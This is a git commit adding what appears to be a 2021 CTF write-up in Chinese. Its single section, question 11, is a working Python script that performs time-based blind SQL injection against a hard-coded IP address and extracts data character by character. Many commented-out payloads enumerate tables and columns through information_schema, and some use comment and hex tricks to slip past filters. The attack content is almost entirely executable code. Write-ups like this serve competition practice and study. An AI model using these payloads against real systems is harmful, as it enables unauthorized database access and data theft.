
Commit f74ccbd

fengfeng
authored andcommitted
1 parent 3af9da4 commit f74ccbd


87 files changed

+752
-0
lines changed


.DS_Store

8 KB
Binary file not shown.
Lines changed: 49 additions & 0 deletions
@@ -0,0 +1,49 @@
1+
# 2021-金砖系统安全-writeup
2+
3+
## 第11题
4+
5+
SQL时间盲注入:
6+
7+
```python
8+
import requests
9+
from time import sleep
10+
url="http://106.14.91.65:8003/index.php"
11+
12+
13+
def charToHex(string):
14+
res = "0x"
15+
for i in string:
16+
res +=str(hex(ord(i))).replace("0x","")
17+
return res
18+
flag='flag{0ca75e4b19583a18e6a0e6517a8b53df}'
19+
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
20+
for i in range(1,100):
21+
for j in "{}0123456789abcdefghijklmnopqrstuvwxyz,-_":
22+
#for j in "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{},-_":
23+
24+
#payload="' or if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{},sleep(0.02),1)#".format(i,j)
25+
#payload="' or if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='flag233333'),{},1))<{},sleep(0.02),1)#".format(i,j)
26+
#payload="' or if(ascii(substr((select group_concat(flagass233) from flag233333),{},1))<{},sleep(0.02),1)#".format(i,j)
27+
#payload="-1'||if(ascii(substr(database(),{},1))<{},1=1,1=2)#".format(i,j)
28+
#payload="-1'||if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{},1))<{},1=1,1=2)#".format(i,j)
29+
#payload="-1'||if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name='words'),{},1))<{},1=1,1=2)#".format(i,j)
30+
#payload="-1'||if(ascii(substr((select group_concat(flag) from `1919810931114514`),{},1))<{},1=1,1=2)#".format(i,j)
31+
#payload = "/**/||case/**/when/**/((select/**/group_concat(table_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/0x25666c616725)like/**/{})/**/then/**/sleep(0.4)/**/else/**/0.4/**/end#".format(charToHex(flag+j+"%"))
32+
#payload = "/**/||case/**/when/**/((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/0x61666c414761)like/**/binary/**/{})/**/then/**/sleep(0.4)/**/else/**/0.4/**/end#".format(charToHex(flag+j+"%"))
33+
payload = "/**/||case/**/when/**/((select/**/group_concat(Value)/**/from/**/aflaga)like/**/binary/**/{})/**/then/**/sleep(0.4)/**/else/**/0.5/**/end#".format(charToHex(flag+j+"%"))
34+
35+
#print(payload)
36+
params = {
37+
"a":"\\",
38+
"b":payload
39+
}
40+
try:
41+
r = requests.get(url=url,params=params,timeout=1.2)
42+
except:
43+
flag += j
44+
print(flag)
45+
sleep(0.3)
46+
"admIN"
47+
"Value" "aflaga"
48+
```
49+
